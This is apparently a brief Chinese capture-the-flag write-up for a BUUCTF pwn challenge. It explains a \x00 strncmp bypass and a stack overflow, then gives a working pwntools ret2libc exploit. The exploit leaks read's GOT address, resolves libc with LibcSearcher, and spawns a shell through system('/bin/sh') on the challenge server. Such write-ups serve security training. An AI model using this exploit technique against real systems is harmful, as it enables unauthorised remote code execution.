偽代碼如下,先獲取一個隨機數
然后用strncmp比較用戶輸入的值和隨機數,這里可以用 \x00 來繞過strncmp,因為strlen遇到 \x00 會停止
因為a1是函數sub_804871F的返回值,那就讓a1為 \xff 這樣就可以進行棧溢出了
然后通過棧溢出來getshell,這里用libcsearcher模塊
腳本如下
# -*- coding:utf-8 -*- from pwn import * from LibcSearcher import * r=remote('node3.buuoj.cn',29889) #r=process('./pwn') elf=ELF('./pwn') write_plt=elf.plt['write'] read_got=elf.got['read'] read_plt=elf.plt['read'] main_addr=0x8048825 payload1='\x00'+'\xff'*0x7 r.sendline(payload1) r.recvuntil('Correct\n') #泄露read的got地址 payload='a'*0xe7+'b'*0x4 payload+=p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(0x8) r.sendline(payload) read_addr=u32(r.recv(4)) print('[+]read_addr: ',hex(read_addr)) libc=LibcSearcher('read',read_addr) libc_base=read_addr-libc.dump('read') system_addr=libc_base+libc.dump('system') bin_sh_addr=libc_base+libc.dump('str_bin_sh') r.sendline(payload1) r.recvuntil('Correct\n') payload='a'*0xe7+'b'*0x4 payload+=p32(system_addr)*2+p32(bin_sh_addr) r.sendline(payload) r.interactive()
